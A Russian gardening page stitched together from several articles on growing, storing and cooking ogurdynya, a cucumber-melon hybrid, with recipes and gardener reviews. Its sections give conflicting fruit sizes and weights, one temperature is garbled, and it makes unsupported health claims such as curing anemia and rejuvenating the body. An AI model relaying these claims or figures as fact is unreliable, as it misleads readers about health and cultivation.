85 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Огурдыня выращивание и уход

Выращивание огурдыни

Ученые-селекционеры постоянно трудятся над разработкой новых и совершенствованием имеющихся видов растений. Огурдыня – гибридный овощ, смесь огурца и дыни ранних сортов. Скороспелый плод полюбили многие, его рекомендуют своим друзьям и знакомым, расхваливая его полезные свойства и вкус.

Польза

Плод имеет низкую калорийность и богатый состав, способствующий укреплению иммунитета. Особенно полезен этот овощ для детей. Из него можно приготовить вкусное сладковатое пюре.

Польза гибрида оценена и в бьюти-сфере. Из него получаются отличные маски и обертывания.

Описание

Плоды длиной 8-12 см появляются на кусте уже в июне – начале июля. Зеленые, они по вкусу и внешнему виду напоминают огурцы. Созрев, плод становится похож мякотью на дыню. Вкус огурдыни может быть даже банановым или карамельным, а цвет зависит от сорта.

Растение может достигать 3 м в длину, из-за чего его сравнивают с лианами, а некоторые сажают его вдоль изгороди.

Разновидности

Сегодня на рынке представлено уже 15 разновидностей гибрида. Вы легко подберете для своего участка подходящий вид, соответствующий Вашим предпочтениям во вкусе, размерах и т.д. Не останавливайте свой выбор на каком-то одном сорте.

Популярными являются следующие сорта огурдыни: Особая, Конфетная, Белая, Оренбургская, Мандурия. У этих растений крепкие стебли и много листвы, вес плодов достигает 3 кг.

Змеевидную форму и необычный цвет имеют овощи следующих видов: Таро, Меланфлехуозус Сахио, Метки Дак Грин. Эти плоды имеют длину до 90 см.

Вытянутая форма и крупные размеры характерны для сортов Александрия, Банан, Карамель, Новинка, Физано, Лартон, Ананасовая, Оранжевый банан.

Выращивание

Существует много разновидностей овоща

При выращивании необходимо учесть некоторые особенности культуры. Растение «любит» теплый и сухой климат, поэтому подойдет хорошо освещенное, проветриваемое и незатененное место, защищенное от сквозняков.

Почва

Почва для огурдыни подходит такая же, как и для огурцов: разрыхленная и способная впитывать и удерживать воду. Растение влаголюбиво, поэтому особенно важен правильный полив на начальных этапах его роста.

Почву следует готовить с осени. Удобрите ее компостом и перегноем, добавьте минеральные подкормки (аммиачную селитру или сульфат калия).

Посадка

Выращивать овощ можно с помощью рассады или же посевом семян в грунт. Способ посадки зависит от Вашего региона проживания:

  • для местностей с мягким климатом выбирают высадку семян в грунт, делают это во второй половине мая;
  • в регионах, где теплая пора задерживается, а само лето короткое, лучше сажать растение с помощью рассады.

Эта культура хладостойкая. Подходит для выращивания в теплице.

Подготовка семян

Перед высадкой в открытый грунт семена огурдыни необходимо замочить в слабом растворе марганцовки на полчаса. Такая мера поспособствует их скорому прорастанию и определит, какие из них непригодны для посадки.

Посев

На первых этапах много внимания требует вопрос орошения почвы. Достаточное количество влаги позволит семенам прорасти.

Их сажают на глубину 2 см на расстоянии друг от друга в 50-100 см.

Когда на растении сформируется 5-6 листков, верхушку прищипывают. Это позволяет ему выпустить боковые побеги. Присыпая некоторые из них землей, Вы способствуете формированию дополнительных корней, что делает культуру крепче и позволяет ей получать из грунта больше влаги и питательных веществ.

За растениями легко ухаживать

Уход за культурой состоит из нескольких простых правил. Поливать растение необходимо 1 раз в неделю, в теплице – еще реже (2 раза в месяц). Прополку сорняков важно делать регулярно. Лучше убирать ненужную траву с помощью секатора.

Удобрения нужны культуре только на этапе роста. Когда появляются первые завязи, внесение подкормок необходимо прекратить. Оптимальным видом подпитки станет навоз, зола или минеральные средства. Вносят их вокруг побегов, стараясь не задеть само растение.

Сложности при выращивании

Главная сложность при выращивании – обеспечить культуре достаточное количество воды, избежав переувлажнения почвы. Чудо-растение склонно к бактериальным заболеваниям, загниванию завязи. Перед очередным поливом загляните под листья, возможно, почва еще не просохла и его необходимо отложить.

Сбор урожая

Собирать овощи можно уже через 1,5-2 месяца после посадки. Плодоносит культура до первых морозов. Один куст может дать до 20 плодов весом 1-3 кг в зависимости от сорта.

Огурдыни рекомендуют хранить в темном и проветриваемом помещении. Температура воздуха должна составлять около 0 °C. В таких условиях плоды смогут «пролежать» примерно 50 суток.

Что такое огурдыня и как ее вырастить в открытом грунте

Что такое огурдыня

Рождение гибрида произошло в Средней Азии, его относят к семейству Тыквенные. По мере созревания культура обладает свойствами огурца, а готовность к употреблению обусловлена изменением цвета и вкусом, напоминающим дыню. Так появился выведенный селекционерами новый вид плодового растения – огурдыня. Пока овощ не созрел, его используют для наполнения салатов, а собранный недоспевший урожай консервируют на зиму в виде солений. Вызревший сладкий плод используется в качестве десертов, его также закрывают как варенье.

Огурдыня – плодовое растение

Видео «Как вырастить огурдыню»

Из этого видео вы узнаете, как на своем участке вырастить огурдыню.

Полезные и питательные свойства культуры

Такой овощ относят к низкокалорийным продуктам, ведь в 100 г плода содержится 38 ккал. Питательная мякоть, состоящая на 90% из воды, обладает большим количеством полезных микроэлементов. В ее состав входят:

  • пектин, нектарин;
  • клетчатка;
  • белки;
  • органические кислоты, минеральные соли;
  • крахмал.

Соотношение полезных элементов зависит в большей степени от сорта выращиваемой культуры. По вкусовым качествам растение напоминает огурец на ранних стадиях созревания, а спелый плод обретает вкусовые ощущения от банана до персика.

Популярные сорта огурдыни

Селекционерами выведены гибриды, плоды которых достигают 3 кг. Существует более 15 сортов, отличающихся по вкусовым и другим свойствам. Они обладают скороспелостью, урожайностью, устойчивостью к холоду и болезням:

Всеобщей любимицей, по мнению большинства садоводов, является Мандурия. Плоды этого сорта достигают 1 кг, они очень сочные. Изменение вкусовых качеств по мере созревания придает экзотичности, особенно при первых вкусовых ощущениях. Еще один популярный сорт – огурдыня Оренбургская. Темно-зеленые плоды длиной 12 см можно снимать уже в середине лета и использовать как нарезку для салатов или консервировать. В середине августа овощ полностью созревает, с одного куста получают более десятка желтых двухкилограммовых сочных плодов.

Достоинства и недостатки

При выведении этого овоща селекционеры пытались взять максимальное количество положительных качеств от скрещиваемых огурцов и дынь. В результате огурдыня обладает следующими достоинствами:

  • неприхотливость;
  • универсальность при использовании плодов (как для солений, так и для десертов);
  • хорошие вкусовые качества;
  • высокая урожайность;
  • длительный период плодоношения;
  • скороспелость;
  • большое количество полезных веществ.

Польза этого овоща для организма немалая: микро- и макроэлементы мякоти помогают при лечении анемии, стимулируют отток желчи, выводят токсины и способствуют восстановлению обмена веществ. Кроме того, плоды огурдыни имеют свойства антиоксидантов.

Без недостатков не обходится ни один овощ. Этот гибрид не исключение:

  • неудобство транспортировки;
  • малый срок хранения свежих плодов;
  • большая склонность к болезням.

Особенности выращивания огурдыни

Неприхотливый гибрид требует при посадке и уходе такого же внимания, как и огурцы. Теплый сухой климат средних широт благоприятен для возведения такой культуры. В зависимости от расположения – от Ставропольского края до Подмосковья – подбирают различные сорта.

Посев семян огурдыни

Оптимальные сроки для выращивания

В открытый грунт гибрид сажают во второй половине мая. Это позволяет защитить культуру от возможных майских заморозков, которые иногда дают о себе знать в первых числах этого теплого месяца. Для того чтобы семена к этому сроку дали всходы, рассаду начинают взращивать уже после 15–20 апреля, что позволяет получить урожай в ранние сроки. Своевременная посадка делает возможным (независимо от разновидности гибрида) сбор плодов до первых заморозков.

Выбор места и подготовка участка

Во избежание перекрестного опыления при определении места заботятся о том, чтобы поблизости не были посажены такие родственные бахчевые культуры, как тыква или кабачок. Грунт под посадку должен быть рыхленным, а его свойства должны позволить сохранять влагу как можно дольше. В качестве удобрений используют сульфат калия, а также селитру.

Посев семян

Холодоустойчивые свойства гибрида не спасут от возможных заморозков, поэтому в регионах, отдаленных от южных областей, приемлемо будет выращивание рассады с последующей высадкой на грядку. В качестве посадочной емкости используют стаканчики или небольшие ящики, которые наполняют торфяным грунтом, затем на глубину не более 2 см делают высадку семян.

Правила ухода и высаживания рассады

Емкости с семенами располагают в теплом, хорошо освещенном месте. Через 4–6 дней саженцы дают всходы. За почвой нужно следить и периодически обильно поливать. В комнате, где находится рассада, нежелательно наличие сквозняков, а температуру в помещении поддерживают на уровне 18–20 °C. Через 30–35 дней саженцы пересаживают в открытый грунт.

Режимы полива и подкормки

Неприхотливость гибрида и склонность к бактериальным болезням требуют размеренного периодического увлажнения почвы, а рассада должна быть высажена таким образом, чтобы грунт проветривался и был доступен для рыхления. Подкормку производят при появлении первых плодов коровяком или куриным пометом. Раннее обогащение почвы питательными веществами приведет к большему развитию стеблевой системы, поэтому момент появления завязей является основополагающим при удобрении грунта.

Прополка и рыхление

Удаление сорняков вокруг куста – необходимое условие выращивания гибрида. Ее проводят аккуратно, чтобы не повредить стебли и листья огурдыни. После обильного полива или дождя грунт взрыхляют, чтобы не образовывалась корка, препятствующая обогащению корневой системы кислородом.

Формирование куста

Чтобы культура давала плоды средних размеров и правильно развивалась, используют прищипывание. Его выполняют над пятым листом основного стебля, а боковые побеги – над 7 или 8 листом. Это позволит образоваться требуемому количеству полноценных завязей. Когда на боковых отростках завяжутся плоды, то прищипывание этих побегов выполняют на уровне 2 или 3 листа. Боковые стебли, касающиеся земли, прикапывают, обеспечивая больший рост корневой системы.

Формирование куста огурдыни

Основные болезни, вредители и методы борьбы с ними

Склонность гибрида к грибковым заболеваниям требует должного внимания и правильного ухода. Самыми распространенными неприятностями для огурдыни являются бактериальная или корневая гниль. Чтобы снизить вероятность инфицирования культуры и вырастить полноценный гибрид, выполняют такие профилактические мероприятия:

  • ежегодно меняют место посадки;
  • выполняют все агротехнические рекомендации по выращиванию того или иного сорта;
  • периодически обрабатывают растение фунгицидами с содержанием меди;
  • пораженные части куста обрезают, затем сжигают;
  • при выявлении корневой гнили куст удаляют вместе с корнями, а место, где он рос, обрабатывают медным купоросом.

Правила сбора и хранения урожая

Универсальность культуры позволяет начинать сбор урожая на ранних стадиях и использовать гибрид в качестве салата. На этой стадии плоды имеют жесткую корку, которая предохранит овощ при транспортировке. При полном созревании огурдыня становится мягче, а корка – тоньше. Это важно учитывать при перевозке, особенно на большие расстояния.

В прохладном помещении при температуре от 0 до +5 °C и хорошем проветривании плоды могут сохранять свои вкусовые качества в течение 1,5–2 месяцев.

Рекомендации по употреблению

Экзотичность овоща делает возможным приготовление салатов, солений и закусок из плодов на ранней стадии созревания. А специфические свойства дозревшего гибрида позволяют использовать готовый продукт в виде десерта, в качестве отдельного блюда или консервации (компоты, варенье). Кроме этого, сладкий плод употребляют в виде цукатов и сушеных долек, обеспечивая стол полезными элементами на протяжении всего года.

Из огурдыни можно делать салаты

Отзывы дачников

Большинство огородников, попробовавших бахчевую культуру впервые, очень удивлены уникальным возможностям использования гибрида в кулинарии. Особенно удивляет, по отзывам огородников, вкус дыни, сопровождаемый ананасовым или банановым ароматом – в зависимости от сорта растения.

«Еще в советские годы пробовала сажать гибрид, который считался диковинкой, и была очень довольна. Потом как-то забылось, затерялось. Теперь благодаря интернету буду выращивать снова. Очень вкусный и универсальный овощ!».

Лариса Ивановна, г. Ставрополь:

«В прошлом году попробовал посадить – все получилось. В качестве огурцов в моей семье данный плод не стал популярен, возможно, потому, что обычные огурцы вкуснее или привычнее. А вот по сладости и аромату понравилось всем, даже соседям. В этом году тоже будем сажать».

Петр, г. Волгоград:

Используя достижения селекционеров, дачники выращивают уникальные и экзотические культуры. Однако приобретая тот или иной гибрид, следует учитывать рекомендации и климатическую приспособленность овоща к местности посадки.

Что такое огурдыня, как её выращивают и едят

Продукт современной селекции – огурдыня – относится к скороспелым гибридам. Культура высоко ценится за необычный вкус и высокую урожайность. Плоды обладают удивительным свойством менять форму и цвет в процессе созревания.

В этой статье мы расскажем об отличительных особенностях огурдыни, способах выращивания, правилах ухода, вкусовых свойствах. Вы узнаете, чем полезна мякоть и как ее приготовить.

Характеристика и описание

Огурдыня – что это такое? Огородники до сих пор не пришли к единому мнению: одни утверждают, что это овоще-фрукт тропического происхождения, другие уверены, что это гибрид, полученный в результате скрещивания огурца и дыни.

Культивацию огурдыни начали в Средней Азии. Селекционеры получили гибрид при помощи скрещивания ранних сортов дыни и неприхотливых сортов огурцов. Растение напоминает огуречный куст, но с более крупными листьями, и достигает двух метров в высоту. Его выращивают в горизонтальном или вертикальном положении.

Форма плодов и вкусовые качества напрямую зависят от стадии спелости. Ранние плоды похожи на огурцы, только с более тонкой кожицей. Размер колеблется от 8 до 12 см. Окраска светло-зеленая, поверхность с мягкой опушкой.

Зрелые плоды по форме напоминают дыню и вырастают до 60–80 см в длину. Масса в среднем составляет 6–8 кг. Кожица желтеет и покрывается зеленоватыми полосками. При разрезе внутри видно небольшое количество семян.

На фото – спелые плоды огурдыни.

Справка. Кожура у плодов тонкая, как у яблока. Поэтому они хранятся не дольше 1,5 месяца в холодильнике или подвале.

Вкусовые качества

На ранней стадии созревания огурдыня практически ничем не отличается от огурцов – ни ароматом, ни вкусом.

По мере дозревания плоды становятся похожими на дыньки. Сладкая, сочная мякоть желто-оранжевого оттенка источает нежный аромат и обладает умопомрачительным вкусом. Вкусовые качества сложно передать словами, ярко выраженный вкус дыни смешивается с нотками банана, апельсина, огурца и меда.

Как ее едят

Плоды в стадии молочной спелости годятся для употребления в свежем виде. Из них готовят овощные салаты, маринуют, засаливают. Продукт не теряет вкусовые свойства и сохраняет первоначальный аромат и цвет.

Из спелых плодов получаются вкуснейшие джемы, компоты и цукаты. Но вкуснее всего и полезнее употреблять их в свежем виде.

Состав и свойства

Огурдыня характеризуется высокой пищевой ценностью, имеет богатый химический состав:

  • витамины А, С, Е, РР, группы В;
  • минералы: магний, натрий, кальций, калий, железо.

Польза и вред

Употребление плодов огурдыни благоприятно влияет на организм человека:

  • разрушает свободные радикалы;
  • оказывает противосклеротическое действие;
  • нормализует работу пищеварительной системы;
  • выводит излишки солей и холестерина;
  • ускоряет метаболизм;
  • омолаживает организм;
  • обладает мягким желчегонным и мочегонным действиями.

Информации о вреде огурдыни не представлено. Возможна индивидуальная непереносимость. Поэтому новый продукт вводите в рацион с осторожностью.

Сорта

Сорта огурдыни различаются по форме плодов, цвету, запаху и вкусу. Всего насчитывают 15 разновидностей.

Сорта для тех, кто предпочитает крупноплодные культуры:

Плоды необычного окраса дают сорта:

  • Таро;
  • Метка Дак Грин;
  • Меланфлехуозус Сахио.

Ровные, слегка вытянутые, с неимоверно сладкой и душистой мякотью плоды получают от сортов:

  • Оранжевый банан;
  • Физано;
  • Банан;
  • Карамель;
  • Александрия;
  • Новинка;
  • Ананасовая.

Справка. Серебристую дыню, или армянский огурец, часто называют огурдыней. Но эти культуры различаются. Огурдыня по мере созревания превращается в дыню. Армянский огурец внешне напоминает длинный огурец с ребристой поверхностью зеленого или белого цвета. При перезревании плоды желтеют и теряют вкусовые качества.

Особенности выращивания и ухода

Выращивание и уход за огурдыней требует соблюдения нескольких условий для достижения оптимального результата и богатого урожая:

  1. Культура любит солнце, поэтому идеальные условия для культивации – сухой и теплый климат.
  2. Почва должна быть плодородной и рыхлой. Ее удобряют компостом, перегноем, сульфатом калия и аммиачной селитрой.
  3. Еще один важный момент – увлажнение грунта. Правильный полив обеспечивают на начальном этапе выращивания всходов.

Подготовка семян и выращивание рассады

Перед посевом семена замачивают в бледно-розовом растворе перманганата калия на 30 минут. Это способствует скорейшему прорастанию посевного материала и позволяет выявить бракованные семена.

Рассаду выращивают путем высеивания семян непосредственно в грунт либо в одноразовые стаканчики. Все зависит от региона проживания.

Посев в грунт практикуют в местностях с теплым и мягким климатом. Семена высеивают в первой декаде мая с промежутком 50–100 см на глубину 2 см. После того как сформируется 5–7 листиков, верхушку пикируют, чтобы растение выпустило боковые побеги. Потом их присыпают землей с целью укрепления корневища.

В регионах, где теплая погода устанавливается позже, а лето непродолжительное, предпочтение отдают высадке с помощью рассады. Для этой цели берут торфяные или пластиковые стаканчики и заполняют влажным универсальным грунтом или специальным для овощных культур. В каждую емкость кладут по одному семечку на глубину 2 см, прикрывают полиэтиленовой пленкой и оставляют в хорошо освещенном месте. Первые всходы появляются через 5–7 дней. Через месяц сеянцы будут готовы к высадке в теплицу или огород.

Уход за огурдыней состоит из нескольких пунктов:

  1. Поливать теплой водой по мере высыхания почвы, но не реже двух раз в неделю в открытом грунте и одного раза в теплице. В период созревания плодов поливы сократить, чтобы плоды получились сладкими, а не водянистыми.
  2. Регулярно делать прополку, удаляя лишнюю траву и сорняки. Одновременно с прополкой рыхлить землю.
  3. По мере необходимости прикапывать отросшие побеги.
  4. Вносить удобрения на начальном этапе роста до появления завязи 1 раз в 2 недели. Лучшие удобрения: зола, коровяк и минеральные вещества. Затем подкормки прекратить.

Сроки созревания и сбора урожая

Когда созревает плод и когда его можно собирать? Огурдыня спеет быстро, плоды начинают собирать спустя 1,5–2 месяца с момента высадки. Если на них появились мелкие трещинки, из которых сочится жидкость, значит, можно срывать.

Плодоношение продолжается до конца сентября и завершается с наступлением заморозков. С одного куста собирают 18–20 плодов весом от 1 до 3 кг.

Возможные трудности при выращивании

Основная сложность выращивания – обеспечение достаточного количества воды без переувлажнения грунта. Переизбыток влаги грозит загниванием завязей и бактериальными болезнями. Прежде чем полить растение, приподнимите листья и осмотрите почву. Если она все еще влажная, повремените с поливом.

При выборе способа выращивания – на земле или шпалере – возьмите во внимание тот факт, что зрелые плоды под весом собственной тяжести легко отделяются от плетей. Падая на землю, они разбиваются и в дальнейшем годятся лишь для получения семян.

Несмотря на то, что огурдыня – теплолюбивая культура, чрезмерную жару она переносит плохо. Поэтому при выращивании в теплице растения часто сбрасывают завязь при экстремально высоких температурах воздуха.

Сладкие плоды с нежной кожурой – излюбленное лакомство голубей, воробьев и скворцов. Для отпугивания птиц опытные огородники устанавливают вертушки с зеркальным напылением, ветряные колокольчики и другие приспособления.

Что приготовить

Огурдыня – продукт универсальный. Кроме употребления в свежем виде, она годится для приготовления салатов, маринованных закусок, десертов, варенья, джемов и компотов.

Предлагаем рецепты вкуснейшего варенья и освежающего компота. Составляющие можно менять по своему смотрению, добавлять любые пряности, фрукты и ягоды.

Варенье

Ингредиенты:

  • огурдыня – 1 шт.;
  • сахар – 350 г;
  • бадьян – 1 звездочка.;
  • сок и цедра 1 лимона.

Плод помойте, разрежьте на две половинки и удалите семена. Промойте под краном и нарежьте кусочками. Кожицу можно не удалять, она очень мягкая.

Положите мякоть в эмалированную миску, добавьте бадьян и засыпьте сахарным песком. Поставьте на маленький огонь и томите до полного растворения сахара. Как только появятся признаки кипения, добавьте лимонный сок и цедру. Перемешайте, проварите 5 минут и разложите в банки. Плотно закупорьте и храните в прохладном месте.

Компот

Ингредиенты:

  • огурдыня – 1 шт.;
  • лимонная кислота – 1 щепотка;
  • сахар – по вкусу (плоды очень сладкие);
  • дистиллированная вода – 3 л.

Помойте плод, удалите смена и крупно нарежьте. Вскипятите воду и подсластите по вкусу. Переложите в нее мякоть, добавьте лимонную кислоту и готовьте не дольше 10–15 минут. Подавайте напиток охлажденным с листиком мяты.

Совет. Компот можно заготовить на зиму. Для этого разлейте кипящую жидкость в чистые банки и закатайте жестяными крышками. Храните в погребе.

Отзывы

Все, кто пробовал выращивать огурдыню, оставляют позитивные отзывы.

Валентина, г. Елец: «В прошлом году сын прислал семена огурдыни сорта Лартон F1. До этого никогда не выращивала и даже не знала о ее существовании. Начитавшись рекомендаций по выращиванию, уверенно взялась за дело. Высаживала через рассаду в открытый грунт. Всходы точь-в-точь напоминали огурцы. Цветение было обильным, завязей много. Плоды больше напоминали большую грушу. Каким же было наше удивление, когда мы попробовали спелый плод на вкус – настоящая медовая дыня, ароматная и очень сладкая».

Олег, г. Липецк: «Люблю экспериментировать и время от времени пробую вырастить на своей даче какое-нибудь новое растение. Три года назад впервые попробовал культивировать огурдыню. Уж больно был наслышан о ее чудесных вкусовых качествах. Результатом был более чем доволен, в этом году тоже планирую высаживать. Уже и рассаду подготовил. Плоды очень вкусные, мякоть сладкая и душистая. Из неспелых плодов иногда готовим салаты, но всегда дожидаемся полной спелости».

Заключение

Огурец, скрещенный с дыней, именуемый огурдыней, пока не получил большого распространения. Причиной тому служит недоверие огородников к малоизвестным растениям. Ведь чтобы вырастить культуру и получить урожай, приходится вложить массу сил и терпения, а результат не всегда бывает удачным. Но те, кто попробовал вырастить этот гибрид, остаются довольны. При соблюдении правил агротехники культура радует богатым урожаем.

Огурдыня

Работа селекционеров идет непрерывно, появляются все новые и новые гибриды растений, получаемые путем скрещивания различных культур. В последнее время широкую популярность среди российских садоводов получила огурдыня. Что это такое? Уже из самого названия становится понятно, что эта культура является чем-то средним между огурцом и дыней.

Что такое огурдыня

Это гибрид, совмещающий в себе свойства огурца и дыни. Главная особенность — размер и вкус плодов: во время плодоношения из небольшого огурца длиной в 10 см вызревает приличных размеров дыня с характерными вкусовыми качествами и ароматом. В пищу можно употреблять даже молодые плоды — они имеют обычный огуречный вкус и запах. Несмотря на то, что огурдыня считается культурой экзотической, она отличается неприхотливостью в уходе и хорошо плодоносит на участках.

Лучшие сорта огурдыни

Сортов гибрида огурца и дыни существует уже около 15 штук, но российским огородникам особенно полюбились сладкие Карамель, Конфетная, Ананасовая и Банановая, а также Нектарин и огурдыня Мандурия.

Огурдыня Нектарин, так же как и Мандурия, характеризуется мощным кустом, способным давать крупные шарообразная плоды весом до 3 кг. В отличие от сладких сортов, огурдыня Нектарин обладает освежающим дынным вкусом, не таким приторным.

Время и правила посадки

Сроки посадки семян огурдыни зависят от способа их посева: на рассаду или сразу в открытый грунт. Для ускорения плодоношения предпочтителен рассадный способ.

Посев на рассаду проводится в конце апреля, а уже через месяц молодые саженцы высаживают на постоянное место. Посев непосредственно в открытый грунт проводится в конце мая, когда земля достаточно прогреется. Глубина заделки семени — 1,5 см, при этом их располагают на расстоянии 1 м друг от друга. Схема посадки при рассадном способе остается той же, а вот глубина посева в стаканчики составляет 2-2,5 см.

Важно! При посеве семян в открытый грунт могут взойти не все. Чтобы в посадках не было «дыр», огурдыню можно высадить по две штуки, а при появлении всходов проредить их. Сильный росток оставляют, а второй прищипывают на уровне почвы, чтобы не повредить сросшиеся вместе корешки.

Перед посевом необходимо провести профилактическую обработку семян. Для этого их нужно замочить в растворе Эпина для стимуляции роста, а для дезинфекции — в слабом растворе марганцовки.

Предпосадочный этап подготовки посадочного места очень важен. Поскольку дынный огурец относится к бахчевых культурам, он, как и другие представители этой группы, нуждается в хорошем освещеннии, хорошо будет расти на безветренном участке. Поэтому огурдыни часто высаживают в теплицы.

огурдыня нуждается в освещении

Обратите внимание! В открытом грунте под них отводят места около заборов, бака и других сооружений для защиты от ветров.

Грядки формируют теплые: наполняют их компостом, перегноем и другой органикой, присыпают слоем рыхлой земли. В бедной почве гибрид тоже будет расти, но плоды будут мелкими и совсем не сладкими.

Выращивание огурдыни

Эта культура не считается капризной, ее выращивание не представляет особого труда. Но есть пара нюансов, влияющих на качество и количество урожая. Особое внимание при уходе нужно уделить поливам и формировке растений.

Полив

После посадки молодые саженцы нуждаются в обильных и частых поливах для наращивания зеленой массы, их проводят раз в два дня, ориентируясь на погодные условия. После образования плодов полив нужен более умеренный. Избыток воды приведет к растрескиванию плодов, а вкус их станет водянистым.

Важно! Чтобы влага из почвы не испарялась слишком быстро, ее рекомендуется замульчировать.

Формирование

Чтобы огурдыня давала высокие урожаи, нужно ее прищипнуть. Процесс формировки проходит поэтапно:

  • вершкование — прищипка главного стебля после пятого листа (к этому времени саженец успевает вырасти до 25 см);
  • прищипывание боковых побегов после седьмого листа;
  • контроль количества завязей: рекомендуется оставлять на одном побеге по 2-3 плода, только в этом случае плоды будут иметь сортовой размер. Остальные завязи ослепляют.

Подкормки проводят периодически, раз в две недели: в период вегетации проливают настоем коровяка, а во время плодоношения вносят комплексные удобрения для бахчевых.

Где можно выращивать огурдыни

В открытом грунте. В условиях Средней полосы, в том числе и в Подмосковье, садоводы практикуют выращивание огурдыни под открытым небом. Сразу после посадки саженцев их необходимо укрыть на несколько дней для адаптации. В открытом грунте огурдыня выращивается в расстил, то есть ее плети лежат на земле. По мере роста отростки у корней присыпают землей для укоренения.

В теплице. В защищенном грунте эту культуру выращивают на шпалере. Плети подвязывают к натянутой под крышей конструкции проволоке, поэтому расстояния между соседними саженцами в схеме посадки уменьшаются.

Важно! При шпалерном способе плоды гибрида помещают в сетки и подвешивают. Так созревающие огурцы со вкусом дыни не упадут под собственным весом на землю.

Холодостойкость и жароустойчивость

Жароустойчивостью огурдыня похвастаться не может — несмотря на то, что эта культура очень светолюбива, при температуре воздуха выше +30°С ее завязи опадают. Поэтому в особо жаркие дни посадки притеняют.

Огуречный гибрид обладает достаточной холодостойкостью для разведения его в Средней полосе. Для повышения этого показателя можно использовать следующие агроприемы:

  • при посадке семян в открытый грунт их предварительно закаливают одним из двух известных способов: переменными температурами или охлаждением;
  • при выращивании рассады молодые саженцы нужно выносить ненадолго на улицу в разную погоду. Таким образом они тоже пройдут закалку.

Закалка семян позволит их посадить в более холодную землю (+100С), поэтому посадка огурдыни в открытый грунт может производиться раньше.

Болезни и вредители огурдыни

Этот гибрид настолько уникален, что больших потерь посадок от поражения вредителями и болезнями замечено не было. Однако существенный урон урожаю в открытом грунте могут нанести птицы, поэтому когда сладкие плоды начинают наливаться, растения накрывают защитной сеткой или устанавливают различного рода отпугиватели.

Уникальный гибрид стоит того, чтобы потратить на него время и силы.

Характеристика огурдыни — выращивание овоща в открытом грунте

Характеристика огурдыни

Некоторые садоводы считают, что огурдыня является тропическим фруктом, который по вкусу напоминает овощ. Огурдыню также называют змеевидной дыней. Особой популярностью пользуется разновидность овоща — огурец-лимон.

Не менее популярным является вид “китайский огурец”. Дачники много спорят о названии и происхождении овоща. Но не поспоришь с тем, что огурдыня отличается отменными вкусовыми качествами!

  • Зеленая огурдыня по внешнему виду и вкусу напоминает огурец.
  • Спелый желтый овощ по вкусу и аромату похож на дыню.

Особенность культуры заключается в том, скороспелая. При правильном уходе урожай собирают до наступления осенних заморозков. В последние годы садоводы часто выращивают огурдыню. А селекционеры трудятся над созданием новых видов уникальной культуры. По вкусу огурдыня может напоминать:

Известно более 15 сортов овощной культуры. Самые востребованные:

  • огурдыня белая;
  • огурдыня особая;
  • огурдыня Оренбургская.

Средний вес овоща составляет 2,5 кг. Вышеназванные сорта являются ранними. Стебли у них крепкие, листья — крупные, тёмно-зелёные. Особого внимания заслуживает змеевидная огурдыня. Она продолговатая, длиной до 90 см.

Выращивание в открытом грунте

Выращивать огурдыню на грядке совсем несложно. Однако важно правильно выбрать место для этой культуры. Огурдыня приживается на хорошо освещенном участке. Что касается почвы, она должна быть:

Также грунт, предназначенный для огурдыни, должен хорошо удерживать влагу. Чтобы культура хорошо плодоносила, надо регулярно поливать ее, особенно в период активного роста. Недопустимо сажать огурдыню в полутени. В этом случае она зацветет, но не сформирует плоды.

Одни садоводы выращивают овощ рассадным способом, другие — генеративным. Если не хотите выращивать рассаду, посейте семена в открытый грунт в конце мая. В это время почва хорошо прогрета.

Огурдыня является холодостойкой культурой, в отличие от своего родственника огурца. Почву для “овоща-трансформера” готовят в середине осени. Если она бедная, скудная, внесите удобрения:

  • перегной;
  • сульфат калия;
  • аммиачную селитру.

Перед тем как посеете семена, также удобрите почву смесью перегноя и коровяка. Чтобы улучшить прорастание семян, поместите их в слабый раствор перманганата калия и выдержите 30 минут. Когда культура начнет активно расти, внесите воду.

Рекомендуется размещать посевной материал на расстоянии 70 см друг от друга, заглубляя на 2 см. После того как увидите 5 листочков, выполните прищипывание главного побега.

Благодаря такой процедуре, боковые ветви будут лучше расти. Огурдыня полезна для здоровья. Она рекомендована людям, у которых проблемы с пищеварением. Данный овощ оказывает желчегонное воздействие.

Уход за огурдыней

Ухаживать за огурдыней несложно. Нужно умеренно поливать ее. В жаркую погоду следует вносить воду 1 раз в 3 дня. В остальных случаях требуется поливать овощ 1 раз в неделю.

При соблюдении режима полива плоды становятся сахаристыми. Не следует слишком часто удобрять почву, в которой растет огурдыня, в противном случае плоды станут невкусными. Уход за огурдыней — это и своевременная прополка. Обязательно удаляйте сорную траву с участка!

Проблемы при выращивании культуры, сбор урожая

Огурдыня, родственница огурца, влаголюбива, но нельзя поливать ее слишком часто, в противном случае корни начнут гнить. Культура склонна к болезням бактериального и грибкового типа. Бактериальные появляются гниением завязей, грибковые — отмиранием корневища. На данном фото уникальный сорт огурдыни — мандурия.

Чтобы растение не болело, надо сеять семена на значительном расстоянии друг от друга. Оно должно быть не менее 50 см. Урожай огурдыни собирают через 2 месяца после посева. Кустарник образует до 20 плодов. Минимальный вес огурдыни — 1 кг, максимальный — 2 кг. Однако масса овоща также зависит от сорта.

Отзывы

Марина, орловская область:

Я считаю, что огурдыня — достаточно капризный овощ. Огурцы хорошо всходят у меня на грядке, а вот подобные гибриды — не очень. Выбрала солнечное место на грядке, посеяла семена, всходы ждала более 10 дней, потом они все-таки появились. Я сделала вывод, что огурдыня любит очень теплый климат. Возможно, мне надо было выращивать рассаду.

У меня в сад теплица, и огурдыня там очень хорошо себя чувствует. Выращивала овощ не рассадным, а семенным методом, все прошло на ура, огурдыня порадовала богатым урожаем. Сеяла семена вместе с огурцом, но на расстоянии около 80 см.

Лилия, г. Нижневартовск:

Я выращиваю огурдыню только для приготовления салатов! Сочетаю его с капустой, редисом, кукурузой. Наверное нужно выбрать сорт с более насыщенным вкусом и ароматом.

Заключение

Название “огурдыня” — сложное и загадочное, несмотря на это, садовую культуру просто разводить, главное — соблюдать правила посадки и ухода. Огурдыня прекрасно подходит для приготовления салатов, она — желанная гостья на моем столе!

Ссылка на основную публикацию
Adblock
detector
